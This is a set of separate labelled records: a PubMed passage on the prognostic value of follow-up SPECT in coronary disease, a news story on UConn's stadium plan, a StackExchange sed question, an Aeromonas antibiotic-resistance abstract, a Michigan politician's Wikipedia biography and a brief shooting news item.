The median follow-up interval between the index and follow-up myocardial perfusion SPECT procedures was 474 days \[interquartile range (IQR)=243--1107 days\]. Abnormal results on follow-up myocardial perfusion SPECT were noted in 591 patients (51.3%). The baseline clinical characteristics and myocardial perfusion SPECT results, according to the results of the follow-up myocardial perfusion SPECT procedures and treatment strategy, are presented in [Table 1](#T1){ref-type="table"}. The patients in the abnormal group were more likely to be male and have a higher incidence of hypertension, diabetes mellitus, and a low ejection fraction. On myocardial perfusion SPECT, the abnormal group had greater baseline perfusion defects than the normal group. The revascularization therapy group was older and more likely to have diabetes mellitus, greater extent of CAD, and high perfusion defect on the initial myocardial perfusion SPECT ([Supplementary Table 1](#S1){ref-type="supplementary-material"}, only online).
### Clinical outcomes
Patients were followed for a median of 6.3 years (IQR=3.7--9.1 years) after the follow-up myocardial perfusion SPECT. During the follow-up period, 188 patients died, 70 patients developed nonfatal MI, and 93 patients underwent unplanned revascularization ([Table 2](#T2){ref-type="table"}). The incidence of MACE was significantly higher in the abnormal group in the overall population and both treatment groups ([Fig. 2](#F2){ref-type="fig"}), and there was also a significant difference in the clinical outcomes of patients according to the result of serial SPECT ([Fig. 3](#F3){ref-type="fig"}). There was also a tendency for a higher risk of events in patients with abnormal follow-up SPECT in comparison with normal SPECT in all subgroups after adjustment using the multivariate Cox model, as indicated in [Table 2](#T2){ref-type="table"}.
Propensity-matched population
-----------------------------
### Baseline characteristics
After performing PS matching, 346, 112, and 212 matched pairs of patients in the overall population, medication alone, and revascularization groups were created, respectively ([Table 3](#T3){ref-type="table"}). There were no significant differences in the baseline clinical characteristics of the PS-matched patients, except the extent of CAD and the results of SPECT.
### Clinical outcomes
In the matched patients, there were 177 MACE events within the median follow-up period of 6.6 years. With respect to the MACE in the matched cohorts, the abnormal group was associated with worse clinical outcomes in the overall population and the revascularization groups ([Fig. 4](#F4){ref-type="fig"}). We noted a consistent pattern in that the abnormal follow-up SPECT group was at a higher risk of MACE and its individual events than the normal group in PS-matched overall patients, medication alone and revascularization groups ([Table 4](#T4){ref-type="table"}).
Predictors of abnormal follow-up SPECT
--------------------------------------
[Table 5](#T5){ref-type="table"} lists the independent predictors of abnormal results on follow-up SPECT. The variables considered for inclusion in the multivariate models were sex, hypertension, diabetes mellitus, body mass index ≥25 kg/m^2^, current smoking, chronic kidney disease, history of previous revascularization therapy, LV ejection fraction \<50%, treatment with CCB, ACEi, or ARB, and the treatment method. Low ejection fraction was a predictor of abnormal follow-up SPECT, the overall population, medication alone and revascularization groups. Revascularization therapy was a protective factor of abnormal SPECT.
DISCUSSION
==========
In the present study, we evaluated the long-term clinical implications of follow-up SPECT during CAD treatment with comparisons of the clinical outcomes between patients with normal and abnormal follow-up SPECT results. The major findings of this study included the following: 1) abnormal results on follow-up SPECT were associated with worse clinical outcomes, as indicated by an increased risk of death, MI, or unplanned revascularization in the overall study population, and 2) low ejection fraction and medical treatment were independent clinical predictors of having an abnormal result on follow-up SPECT.
Previous randomized studies of serial myocardial perfusion SPECT demonstrated significant reductions in myocardial ischemia after diverse interventions, including the administration of medical therapy or coronary revascularization.[@B22][@B23] In the COURAGE sub-study, residual ischemia was an unadjusted predictor of events, although the noted association was not significant when adjusted for the treatment arm.[@B10] Recent studies have further suggested that a reduction in ischemia on myocardial perfusion SPECT with either medical or coronary revascularization therapy may identify a patient at lower risk for a subsequent cardiac event.[@B10][@B24] Despite the potential advantages of follow-up myocardial perfusion SPECT, clinical practice guidelines and appropriate use criteria do not recommend routine serial testing due to the lack of evidence that supports the benefit of follow-up myocardial perfusion SPECT.[@B13][@B25] A report suggested that \>5% worsening ischemia is an independent predictor of death or MI, irrespective of the treatment arm, such as medical therapy or revascularization.[@B26] However, these previous studies were limited by small study populations or case-control designs. Our study, despite its retrospective, single-center, observational study design, is relatively stronger, because it includes a larger study population that was treated at a real-world practice with a longer follow-up period.
The present study demonstrates that follow-up ischemia is associated with adverse outcomes, such as death, MI, and unplanned revascularization. The association between mortality and follow-up ischemia is in line with a previous study that reported that revascularization reduces mortality in patients with an ischemic burden ≥10% on baseline myocardial perfusion SPECT.[@B7][@B27] In our study, among the overall population and the revascularization group, abnormal results on follow-up SPECT demonstrated an increased risk of MACE, death, and MI. In the medical group, abnormal SPECT was also associated with a higher risk of MACE and unplanned revascularization. Due to the observational study design, unfavorable clinical factors, such as male sex and lower LV ejection fraction, may contribute to worse clinical outcomes in patients with abnormal follow-up SPECT. However, consistent findings after rigorous adjustment with PS matching support our hypothesis that the prognostic benefit of baseline myocardial perfusion SPECT could be applied to follow-up perfusion SPECT in order to predict long-term clinical prognosis. These results indicate that serial myocardial SPECT after receiving either medication alone or revascularization therapy may be helpful for predicting prognosis and subsequently determining the need for more aggressive treatment.
According to current guidelines, myocardial perfusion SPECT is considered appropriate when symptom recurrence, suspected incomplete revascularization, or ≥5 years after CABG.[@B13][@B28] Therefore, it is of interest to select appropriate patients who can receive myocardial SPECT as a risk assessment modality when they demonstrate the ambiguous presentation of symptoms. Our present findings indicate that abnormal myocardial SPECT results are common in patients with low LV ejection fraction and treatment with medication only. These factors may be indirectly associated with abnormal follow-up SPECT due to the risk of revascularization or decompensated symptoms of CAD.[@B29][@B30] Therefore, our analysis implies that patients with the risk factors for abnormal SPECT are potential candidates who could benefit from receiving follow-up SPECT in order to determine the appropriate treatment strategy.
Our study had some limitations. This was a single-center, observational, retrospective study with the biases that are inherent to this type of analysis. There were also significant baseline differences between patients with normal and abnormal follow-up myocardial SPECT. In addition, patients did not routinely receive serial myocardial perfusion SPECT; rather SPECT was performed at the discretion of the individual physician. Even after statistical adjustment therefore, unobserved confounders might have influenced the results. However, the patients in this study may be representative of a real-world population in daily clinical practice. Finally, due to the small study population, an ischemic threshold on follow-up SPECT for determining clinical prognosis was not evaluated.
In conclusion, abnormal follow-up SPECT results appear to have prognostic implications during CAD treatment in patients receiving either medication alone or revascularization therapy.
This study was partly supported by a grant from the Korea Healthcare Technology R&D Project, Ministry of Health and Welfare, Republic of Korea (HI14C0517 and HI15C1790).
The authors have no financial conflicts of interest.
SUPPLEMENTARY MATERIALS
=======================
###### Supplementary Table 1
Baseline Characteristics According the Treatment Groups
###### Supplementary Fig. 1
Distribution of propensity scores and standardized differences in the mean or proportion of variables before and after matching. (A, B, and C). Distribution of propensity scores before and after propensity score matching. (D, E, and F). Standardized differences in the mean or proportion of variables before and after propensity score matching. Each circle indicates the individual covariates in the propensity score model, and each line indicates how they changed after propensity score matching.
{#F1}
{#F2}
{#F3}
{#F4}
###### Baseline Characteristics of the Study Patients with Normal and Abnormal Follow-Up SPECT Results

Variables Total population Medication group Revascularization group
--------------------------------- ------------------ ------------------ ------------------------- -------------- -------------- --------- ------------- ------------- ---------
Age, yr 61.4±9.6 61.7±10.0 0.564 61.6±10.4 61.1±10.3 0.611 61.3±9.3 62.2±9.8 0.191
Male 380 (67.6) 435 (73.6) 0.030 110 (65.9) 199 (74.0) 0.089 270 (68.4) 236 (73.3) 0.174
BMI, kg/m^2^ 25.1±3.0 25.2±3.5 0.447 25.3±2.9 25.0±3.8 0.421 25.0±3.0 25.4±3.3 0.109
Hypertension 340 (60.5) 395 (66.8) 0.030 98 (58.7) 191 (71.0) 0.011 242 (61.3) 204 (63.4) 0.620
Diabetes mellitus 179 (31.9) 233 (39.4) 0.009 44 (26.3) 94 (34.9) 0.077 135 (34.2) 139 (43.2) 0.017
Hyperlipidemia 201 (35.8) 207 (35.0) 0.841 59 (35.3) 110 (40.9) 0.290 142 (35.9) 97 (30.1) 0.117
Current smoker 162 (28.8) 184 (31.1) 0.149 54 (32.3) 83 (30.9) 0.770 108 (27.3) 101 (31.4) 0.482
Chronic renal failure 23 (4.1) 33 (5.6) 0.298 13 (7.8) 25 (9.3) 0.713 10 (2.5) 8 (2.5) 1.000
Chronic lung disease 15 (2.7) 10 (1.7) 0.349 9 (5.4) 7 (2.6) 0.214 6 (1.5) 3 (0.9) 0.715
Laboratory data
Total cholesterol, mg/dL 180.6±42.5 181.2±41.2 0.801 182.1±40.2 181.2±38.9 0.825 178.0±43.4 181.2±43.0 0.703
Serum creatinine, mg/dL 1.1±1.0 1.3±1.7 0.009 1.2±1.2 1.5±2.2 0.071 1.1±0.9 1.2±1.2 0.217
LV EF, % 59.0±8.1 53.1±11.6 \<0.001 57.5±8.6 53.0±11.6 \<0.001 59.7±7.8 53.2±11.7 \<0.001
LV EF \<50% 36 (6.4) 175 (29.6) \<0.001 13 (7.8) 78 (29.0) \<0.001 23 (5.8) 97 (30.1) \<0.001
Medications
Beta-blocker 424 (75.4) 464 (78.5) 0.243 116 (69.5) 208 (77.3) 0.087 308 (78.0) 256 (79.5) 0.685
CCB 512 (91.1) 489 (82.7) \<0.001 126 (75.4) 192 (71.4) 0.412 386 (97.7) 297 (92.2) 0.001
ACEi or ARB 164 (29.2) 280 (47.4) \<0.001 53 (31.7) 138 (51.3) \<0.001 111 (28.1) 142 (44.1) \<0.001
Statin 340 (60.5) 339 (57.4) 0.307 55 (32.9) 116 (43.1) 0.044 285 (72.2) 223 (69.3) 0.443
Coronary angiography 463 (82.4) 442 (74.8) 0.002 91 (54.5) 144 (53.5) 0.923 398 (100.0) 324 (100.0) 1.000
Disease extent \<0.001 \<0.001 \<0.001
1 vessel 129 (23.0) 105 (17.8) 24 (14.4) 49 (18.2) 85 (21.4) 56 (17.4)
2 vessel 111 (19.8) 110 (18.6) 16 (9.6) 39 (14.5) 95 (23.9) 71 (22.0)
3 vessel 207 (36.8) 229 (38.7) 11 (6.6) 35 (13.0) 196 (49.2) 194 (60.2)
Left main disease 83 (14.8) 72 (12.2) 0.048 3 (1.8) 4 (1.5) 0.365 80 (20.3) 68 (21.1) 0.520
SPECT results
Interval between 2 tests, days 734.2±723.9 817.6±705.7 0.048 1237.0±802.2 1082.8±724.8 0.039 521.6±567.9 596.1±607.1 0.091
SSS at baseline 8.3±4.3 9.9±5.2 \<0.001 7.2±4.0 8.2±4.2 0.011 8.8±4.4 11.3±5.4 \<0.001
SSS at follow-up 0.8±1.2 7.8±3.9 \<0.001 0.9±1.2 7.6±3.7 \<0.001 0.8±1.1 8.0±4.0 \<0.001
Angina at follow-up 114 (20.3) 124 (21.0) 0.770 41 (24.6) 61 (22.7) 0.653 73 (18.5) 63 (19.0) 0.713
ACEi, angiotensin converting enzyme inhibitor; ARB, angiotensin receptor blocker; BMI, body-mass index; CCB, calcium channel blocker; LV EF, left ventricular ejection fraction; SPECT, single-photon emission computed tomography; SSS, summed stress score.
Values are presented as a n (%) or mean±SD.
###### Clinical Outcomes in Patients with Abnormal Follow-Up SPECT in Comparison with Normal SPECT in the Overall Population

Variables Normal Abnormal Unadjusted HR (95% CI) *p* value Adjusted HR (95% CI)^\*^ *p* value
------------------------------ ------------ ------------ ------------------------ ----------- -------------------------- -----------
Overall population^†^
MACE 111 (19.8) 191 (32.3) 1.735 (1.373−2.193) \<0.001 1.595 (1.249−2.038) \<0.001
Death 74 (13.2) 114 (19.3) 1.472 (1.098−1.972) 0.010 1.235 (0.907−1.681) 0.180
Myocardial infarction 22 (3.9) 48 (8.1) 2.114 (1.276−3.502) 0.004 1.697 (0.997−2.888) 0.051
Unplanned revascularization 37 (6.6) 56 (9.5) 1.477 (0.975−2.237) 0.066 1.634 (1.060−2.517) 0.026
Medication group^‡^
MACE 36 (21.6) 87 (32.3) 1.492 (1.012−2.201) 0.044 1.472 (0.979−2.211) 0.063
Death 32 (19.2) 54 (20.1) 0.974 (0.629−1.509) 0.907 0.978 (0.616−1.550) 0.923
Myocardial infarction 5 (3.0) 23 (8.6) 2.667 (1.013−7.021) 0.047 2.134 (0.770−5.915) 0.145
Unplanned revascularization 5 (3.0) 20 (7.4) 2.309 (0.864−6.168) 0.095 2.118 (0.764−5.872) 0.149
Revascularization group^§^
MACE 75 (19.0) 104 (32.3) 1.772 (1.316−2.384) \<0.001 1.662 (1.218−2.269) 0.001
Death 42 (10.6) 60 (18.6) 1.720 (1.159−2.552) 0.007 1.409 (0.930−2.133) 0.106
Myocardial infarction 17 (4.3) 25 (7.8) 1.791 (0.967−3.317) 0.064 1.613 (0.847−3.072) 0.146
Unplanned revascularization 32 (8.1) 36 (11.2) 1.414 (0.878−2.277) 0.154 1.602 (0.980−2.620) 0.060
ACEi, angiotensin converting enzyme inhibitor; ARB, angiotensin receptor blocker; CI, confidence interval; HR, hazard ratio; MACE, major adverse cardiac events; SPECT, single-photon emission computed tomography.
^\*^The adjusted covariates included age, diabetes mellitus, chronic renal failure, chronic lung disease, use of ACEi or ARB, use of statins, and left ventricular ejection \<50%, ^†^Nomal: n=562, abnormal: n=591, ^^‡^^Nomal: n=167, abnormal: n=269, ^§^Nomal: n=395, abnormal: n=322.
###### Baseline Characteristics between the Patients with Normal and Abnormal Follow-Up SPECT Results in the Propensity Score-Matched Population

Variables Total population Medication group Revascularization group
---------------------------------- ------------------ ------------------ ------------------------- -------------- -------------- --------- ------------- ------------- -------
Age, yr 61.8±9.2 61.8±9.6 0.952 60.5±10.6 61.5±9.4 0.480 61.0±9.5 62.4±10.0 0.140
Male 389 (70.1) 404 (72.8) 0.340 74 (66.1) 74 (66.1) 1.000 148 (69.8) 144 (67.9) 0.753
BMI, kg/m^2^ 25.1±2.8 25.2±3.0 0.880 25.3±2.5 25.2±3.1 0.698 24.9±3.2 25.1±2.9 0.477
Hypertension 217 (62.7) 216 (62.4) 1.000 68 (60.7) 78 (69.6) 0.207 132 (62.3) 138 (65.1) 0.614
Diabetes mellitus 112 (32.4) 119 (34.4) 0.629 28 (25.0) 29 (25.9) 1.000 77 (36.3) 82 (38.7) 0.688
Hyperlipidemia 119 (34.4) 113 (32.7) 0.687 39 (34.8) 42 (37.5) 0.781 66 (31.1) 66 (31.1) 1.000
Current smoker 93 (27.5) 97 (29.0) 0.723 38 (33.9) 33 (29.5) 0.712 67 (31.8) 59 (27.8) 0.438
Chronic renal failure 14 (4.0) 12 (3.5) 0.842 9 (8.0) 7 (6.2) 0.795 3 (1.4) 4 (1.9) 1.000
Chronic lung disease 8 (2.3) 7 (2.0) 1.000 8 (7.1) 3 (2.7) 0.216 2 (0.9) 3 (1.4) 1.000
Laboratory data
Total cholesterol, mg/dL 183.0±42.1 182.6±42.7 0.902 185.2±40.4 181.6±34.9 0.480 179.5±44.0 180.9±43.8 0.739
Serum creatinine, mg/dL 1.1±0.0 1.1±1.1 0.876 1.2±1.3 1.1±1.2 0.663 1.1±1.1 1.1±1.1 0.872
LV EF, % 59.2±8.4 58.3±7.9 0.170 58.5±8.0 59.2±6.7 0.496 58.9±7.9 58.2±7.7 0.297
LV EF \<50% 24 (6.9) 23 (6.6) 1.000 7 (6.2) 5 (4.5) 0.767 17 (8.0) 18 (8.5) 1.000
Medications
Beta-blocker 271 (78.3) 272 (78.6) 1.000 80 (71.4) 84 (75.0) 0.651 168 (79.2) 172 (81.1) 0.715
CCB 313 (90.5) 301 (87.0) 0.186 85 (75.9) 84 (75.0) 1.000 206 (97.2) 202 (95.3) 0.445
ACEi or ARB 108 (31.2) 98 (28.3) 0.454 29 (25.9) 30 (26.8) 1.000 74 (34.9) 64 (30.2) 0.351
Statin 200 (57.8) 199 (57.5) 1.000 34 (30.4) 29 (25.9) 0.552 144 (67.9) 146 (68.9) 0.917
Coronary angiography 292 (84.4) 288 (83.2) 0.757 67 (59.8) 69 (61.6) 0.891 196 (92.5) 196 (92.5) 1.000
Disease extent 0.016 0.008 0.025
1 vessel 63 (18.2) 43 (12.4) 19 (17.0) 21 (18.8) 42 (19.8) 22 (10.4)
2 vessel 67 (19.4) 75 (21.7) 13 (11.6) 19 (17.0) 52 (24.5) 46 (21.7)
3 vessel 136 (39.3) 152 (43.9) 9 (8.0) 19 (17.0) 102 (48.1) 127 (59.9)
Left main disease 51 (14.7) 47 (13.6) 0.893 3 (2.7) 2 (1.8) 0.327 37 (17.5) 41 (19.3) 0.854
SPECT results
Intervals between 2 tests, days 728.6±699.0 752.7±657.5 0.640 1230.1±794.9 1056.6±713.0 0.087 507.8±612.9 617.7±577.9 0.058
SSS at baseline 8.1±4.0 9.3±4.9 \<0.001 7.0±3.6 7.4±3.6 0.367 8.8±4.5 10.7±5.0 0
SSS at follow-up 0.8±1.1 7.3±3.7 \<0.001 0.7±1.1 6.5±2.8 \<0.001 0.8±1.2 7.4±3.7 0
Angina at follow-up 71 (20.5) 77 (22.3) 0.643 30 (26.8) 26 (23.2) 0.643 42 (19.8) 48 (22.6) 0.553
ACEi, angiotensin converting enzyme inhibitor; ARB, angiotensin receptor blocker; BMI, body-mass index; CCB, calcium channel blocker; LV EF, left ventricular ejection fraction; SPECT, single-photon emission computed tomography; SSS, summed stress score.
Values are presented as a n (%) or mean±SD.
###### Clinical Outcomes in Patients with Abnormal Follow-Up SPECT Compared with Normal SPECT in a Propensity-Matched Population

Variables Normal group Abnormal group Adjusted HR^\*^ (95% CI) *p* value
------------------------------------- -------------- ---------------- -------------------------- -----------
Overall population (346 pairs)
MACE 66 (19.1) 111 (32.1) 1.727 (1.273−2.344) \<0.001
Death 44 (12.7) 59 (17.1) 1.230 (0.830−1.821) 0.302
Myocardial infarction 15 (4.3) 26 (7.5) 1.694 (0.896−3.202) 0.105
Unplanned revascularization 25 (7.2) 38 (11.0) 1.566 (0.945−2.595) 0.082
Medication group (112 pairs)
MACE 25 (22.3) 34 (30.4) 1.374 (0.801−2.358) 0.248
Death 22 (19.6) 17 (15.2) 0.701 (0.359−1.367) 0.297
Myocardial infarction 3 (2.7) 12 (10.7) 5.370 (1.401−20.583) 0.014
Unplanned revascularization 5 (4.5) 8 (7.1) 1.488 (0.457−4.842) 0.509
Revascularization group (212 pairs)
MACE 38 (17.9) 64 (30.2) 1.730 (1.154−2.594) 0.008
Death 22 (10.4) 32 (15.1) 1.274 (0.734−2.208) 0.389
Myocardial infarction 7 (3.3) 15 (7.1) 2.094 (0.850−5.160) 0.108
Unplanned revascularization 18 (8.5) 27 (12.7) 1.571 (0.863−2.861) 0.140
ACEi, angiotensin converting enzyme inhibitor; ARB, angiotensin receptor blocker; CI, confidence interval; HR, hazard ratio; MACE, major adverse cardiac events; SPECT, single-photon emission computed tomography.
^\*^Adjusted covariates included age, diabetes mellitus, chronic renal failure, chronic lung disease, use of ACEi or ARB, use of statin, and left ventricular ejection \<50%; adjusted HRs represent the risk of each clinical outcome comparing abnormal follow-up SPECT with normal follow-up SPECT.
###### Independent Predictors of an Abnormal Follow-Up SPECT^\*^

Variables Revascularization group Revascularization group Revascularization group
----------------- ------------------------- ------------------------- ------------------------- ------- ------------- ------- ------- -------------- ---------
Male 1.342 0.968−1.860 0.077 2.147 1.133−4.069 0.019 1.161 0.788−1.710 0.449
BMI ≥25 kg/m^2^ 1.124 0.851−1.486 0.410 0.854 0.499−1.464 0.567 1.262 0.905−1.759 0.170
LV EF \<50% 5.330 3.393−8.374 \<0.001 3.499 1.462−8.373 0.005 6.041 3.558−10.256 \<0.001
ACEi or ARB 1.240 0.905−1.699 0.181 1.352 0.735−2.485 0.332 1.234 0.847−1.796 0.273
Medical therapy 2.683 1.934−3.721 \<0.001 \- \- \- \- \- \-
ACEi, angiotensin converting enzyme inhibitor; ARB, angiotensin receptor blocker; BMI, body-mass index; CI, confidence interval; LV EF, left ventricular ejection fraction; OR, odds ratio; SPECT, single-photon emission computed tomography.
^\*^Adjusted covariates included male sex, hypertension, diabetes mellitus, current smoking, chronic renal failure, BMI ≥25 kg/m^2^, LV EF \<50%, treatment with ACEi or ARB, and medication therapy.
[^1]: ^\*^Se Hun Kang and Hyo In Choi contributed equally to this work.
|
{
"pile_set_name": "PubMed Central"
}
|
UConn Sees Support Faltering For a New Football Stadium
Two years ago, when the University of Connecticut men's and women's basketball teams visited the Capitol, legislators greeted them wildly, crowding around for autographs. The school's president later attributed the state's decision to give the university $1 billion for renovations to the ''Huskymania'' generated by the top-ranked basketball teams.
So a few months ago, when Gov. John G. Rowland and legislative leaders swung behind the university's proposal to upgrade its football program and build a new stadium, the issue seemed like a slam dunk.
Yet in the last two weeks, support for the $107 million project has been eroding so quickly that Governor Rowland backed away from calling a special session of the State Legislature on the matter. And on Wednesday, when university officials testify before a legislative hearing, they will be taking what could be their last shot at selling the proposal.
''They will have to pull a rabbit out of their hat,'' said State Senator William H. Nickerson, a Republican of Greenwich and an outspoken opponent of the stadium.
The school's proposal to build a stadium was once seen as almost inevitable, because school officials had said that failure to upgrade to Division IA would jeopardize the school's standing in the Big East basketball conference. With the popularity of the Huskies basketball teams, few lawmakers were ready to stand in the way. But in the last few months, school officials have said that a failure to move into the Division IA Big East football conference would have no immediate impact on the basketball program.
And the university's effort to move into the big leagues of college football -- to upgrade its program from Division 1AA to 1A -- comes as football is undergoing harsh scrutiny at neighborhing schools.
Boston University has decided to end its century-old football program because of the heavy financial losses it incurred. And Rutgers University, which opened a new $30 million football stadium in 1994, has seen average attendance drop to 19,000 this year, from 31,470 three years ago.
Still, UConn officials say that the university stands alone among comparable state research institutions, like the University of Michigan and the University of Texas, in not having Division 1A football.
An error has occurred. Please try again later.
You are already subscribed to this email.
''We need more excitement at UConn,'' said Philip E. Austin, the university's president. He said the school has been burdened with an ''intractable notion -- there is nothing to do in Storrs,'' UConn's rural town in eastern Connecticut that students sometimes refer to as ''snores.''
Yet arguments for the 35,000-seat stadium have not won wide support. Today, United States Representative Barbara B. Kennelly, a Democratic gubernatorial candidate, issued a statement saying, ''We have to get our priorities straight.'' She noted that the $7.2 million in debt service for the stadium would almost equal the amount spent on public scholarships, and that the total stadium cost of $107 million would be roughly three-quarters the amount of all state aid for UConn's academic programs.
Other schools, like the University of Alabama at Birmingham and the State University of New York at Buffalo, are currently upgrading their football programs. And Rutgers has enthusiastic defenders of its decision to build a 40,500-seat stadium.
''I think it's one of the wisest decisions the Legislature has made,'' said Assemblyman Walter J. Kavanaugh, a Republican from Somerville who co-sponsored the legislation authorizing the stadium in 1991.
Still, at $30 million, the Rutgers stadium cost less than a third of what the UConn stadium would cost. The Buffalo school's new stadium, built in 1993, cost $26 million.
UConn officials said that comparing college stadiums is like comparing apples and oranges. Their proposal not only includes a stadium, but a new road to relieve traffic as well as practice fields, parking, a weight room and office space for the increased staff.
To make the move to Division IA football, the National Collegiate Athletic Association requires that the football program have a stadium that can seat roughly 30,000 fans. University officials have said that a decision to build the stadium must be made by Dec. 31, as the Big East football conference's invitation to Connecticut to join the league will expire on that date.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Grep, Sed... Awk to modify lines in a file
I've searched for this but I didn't find exactly what I'm looking for.
What I want to do is replace in the same file all the lines that contains a jar file with "PATTERN" text in the name so that I can add in those lines a new property with the sourcecode for those jar files. The sourcecode for those jars will be always in same relative folder (i.e. path1/lib/a.jar -> path1/src/java)
An example of this. This is my original file:
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/Search/I18N/lib/MOM-Search-I18N-0.23-ECI.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/DAS/lib/axis-1.4.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/REST/lib/org.json.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/StoreFront/lib/MOM-Search-I18N-Index-0.23-ECI.jar" />
And I want to get this:
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/Search/I18N/lib/MOM-Search-I18N-0.23-ECI.jar" sourcepath="/sde/ATG/ATG10.1.2/Momentum/Search/I18N/src/main/java" />
<classpathentry path="/sde/ATG/ATG10.1.2/DAS/lib/axis-1.4.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/REST/lib/org.json.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/StoreFront/lib/MOM-Search-I18N-Index-0.23-ECI.jar" sourcepath="/sde/ATG/ATG10.1.2/Momentum/StoreFront/src/main/java"/>
I need to add a sourcepath attribute to the lines with my pattern and that sourcepath value should take the root of the path value.
As
grep -o 'path="[/-.0-9A-Za-z]*/lib/MOM[-.0-9A-Za-z]*.jar"' test.txt
gives me the lines that contain lines with the jars I'm looking for, I thought that this would solve my problem:
cat test.txt | sed -r 's|path="[/-.0-9A-Za-z]*/lib/MOM[-.0-9A-Za-z]*.jar"|\1 sourcepath="\2/main/src/main/java"/>|'
But gives me this error: sed: -e expression #1, char 91: invalid reference \2 on `s' command's RHS
Any idea?
Thanks guys!
A:
You could say:
sed 's| \(path=.*\)\(/lib\)\(/MOM[^ ]*\)| \1\2\3 source\1/src/main/java"|' inputfile
For your sample input, it'd produce:
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/Search/I18N/lib/MOM-Search-I18N-0.23-ECI.jar" sourcepath="/sde/ATG/ATG10.1.2/Momentum/Search/I18N/src/main/java" />
<classpathentry path="/sde/ATG/ATG10.1.2/DAS/lib/axis-1.4.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/REST/lib/org.json.jar" />
<classpathentry path="/sde/ATG/ATG10.1.2/Momentum/StoreFront/lib/MOM-Search-I18N-Index-0.23-ECI.jar" sourcepath="/sde/ATG/ATG10.1.2/Momentum/StoreFront/src/main/java" />
|
{
"pile_set_name": "StackExchange"
}
|
Aspects of constitutive and acquired antibioresistance in Aeromonas hydrophila strains isolated from water sources.
Over the last three decades, the literature pointed out the implications of Aeromonas species in human pathology. These species were described as being involved in intestinal (several outbreaks of acute gastroenteritis of choleric/dysenteric form or chronic diarrhoea, ulcerative colitis, etc.) in normal adults or children, as well as in extraintestinal infections in immunocompromised hosts. This last aspect included a large range of cutaneous injuries (micronecrosis, abscesses, bums, cellulites, furunculosis), joint, bones, respiratory, urinary tract, ocular infections up to meningitis, endocarditis, peritonitis, hepatobilliary disease, endotoxic shock and septicemia (as consequence of leech microvascular surgery). During the last decade, the literature reported a high mortality in Aeromonas infections determined by certain phenospecies (A. hydrophila and A. veronii) especially in extraintestinal infections in immunocompromised patients. In microbiologists' opinion this high rate of mortality was probably due to poor knowledge concerning the aspects of antibioresistance in Aeromonas strains, to empiric treatments with antibiotics to which these bacteria exhibiting constitutive resistance lead to insuccessful results, and at last to the increasing trend of aeromonads resistance to certain antibiotics after 1996. The literature mentioned also that for a great number of Beta-lactamase producing Aeromonas strains, the use of microdilution method (by comparison to disk diffusion in agar medium) giving false results made more difficult the true knowledge of Aeromonas antibioresistance patterns. At the same time, in 2002, the literature mentioned 4 ecological compartments considered as "reservoirs for dissemination and transfer of microbial antibioresistance i.e. humans, animals, plants and natural soil and water. In the last time, more and more data of the literature revealed that some bacteria with role of reservoir of antibioresistance in the natural environment, even without a direct medical impact, however they could play an indirect one remaining permanent sources of R genes for bacterial strains with pathogenic abilities implicated in human pathology (i.e. Aeromonas infections in man related to different professional activities such as fishing, surfing, swimming, diving, etc.). The purpose of this work was to determine the aspects related to constitutive and acquired antibioresistance in 35 A. hydrophila strains isolated in aquatic environment of Danube Delta (10 salmaster waters, 5 aquatic plants, 5 fish intestinal content, 5 fish sapling, 5 snake and oyster shells). The strains were biochemically identified by using API20E and API20NE kits. The antibioresistance spectrum was determined by disk diffusion method following NCCLS 2000 recommendations. The choice and disposal of antibiotics on the Mueller Hinton plate was done to allow the interpretive reading and the phenotypic detection of different antibioresistance mechanisms, as follows: beta-lactamases (PEN, ME, AMX, AMC, CAZ) and carbapenemase (IMP) production; porin deficiency (FOX); efflux mechanism (C, TE, NOR). All tested strains exhibited high resistance to penicillin, aspect pleading for constitutive penicillinase production in Aeromonas strains. With reference to other penicillins (ME, AMX, AMC) and cephalosporins (CAZ, FOX) the tested strains exhibited 2 different antibioresistance patterns: AMX-R, AMC-S, CAZ-S (65%) indicating the presence of beta-lactamase sensitive to inhibitors and AMX-R, AMC-R, CAZ-S (22%) indicating the presence of beta-lactamase resistant to inhibitors. Resistance to FOX in 8% of strains signifies a phenotypical marker for the presence of porin deficiency. Only one Aeromonas strain (2.8%) was resistant to IMP. Three strains (8%) were simultaneous resistant to TE and TMP/SMX, NOR and CHL probably due to the presence of a resistance plasmid (codifying an efflux/ enzymatic mechanism). These aspects are pleading for the necessity to investigate the bacterial antibioresistance patterns of bacterial strains isolated from the environment, in the purpose to identify the factors responsible for the spreading of certain antibioresistance mechanisms in the external medium as risk factors for the colonization process with possible impact upon the human pathology.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Lynn C. Gardner
Lynn C. Gardner was a Republican politician from Michigan who served in the Michigan House of Representatives from 1925 through 1930. He served as Speaker of the House during the 54th Legislature.
Born to Robert and Frances Gardner in 1877, Gardner was educated in the local schools and became a farmer and teacher in Iosco Township. Gardner was a member of the Independent Order of Odd Fellows, the Grange, the Farm Bureau and the Farmers Union.
Prior to his election to the House in 1922, Gardner served on the local school board, as a township supervisor, and as justice of the peace. He was an unsuccessful candidate for the Michigan Senate in 1930. In 1939, he began a term of service on the Michigan Fair Board, and was an alternate delegate to the 1948 Republican National Convention.
References
Category:1877 births
Category:1948 deaths
Category:People from Livingston County, Michigan
Category:Farmers from Michigan
Category:School board members in Michigan
Category:Michigan Republicans
Category:Members of the Michigan House of Representatives
Category:Speakers of the Michigan House of Representatives
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Bryan Thomas Lopes, 39, will not be charged with shooting Paul Willard Dobson, 47, who came crashing into his room on Oct. 20.
OAK ISLAND – A Lincolnton man will not be charged for shooting an intruder in his motel room last Sunday.
On Friday, Brunswick County District Attorney Jon David announced that Bryan Thomas Lopes, 39, was found to be legally justified in shooting Paul Willard Dobson, 47, when he came crashing into Lopes' room at the Ocean Crest Motel on Oct. 20. The shooting was found to be justified under “defense of habitation” doctrine, according to a release from David’s office.
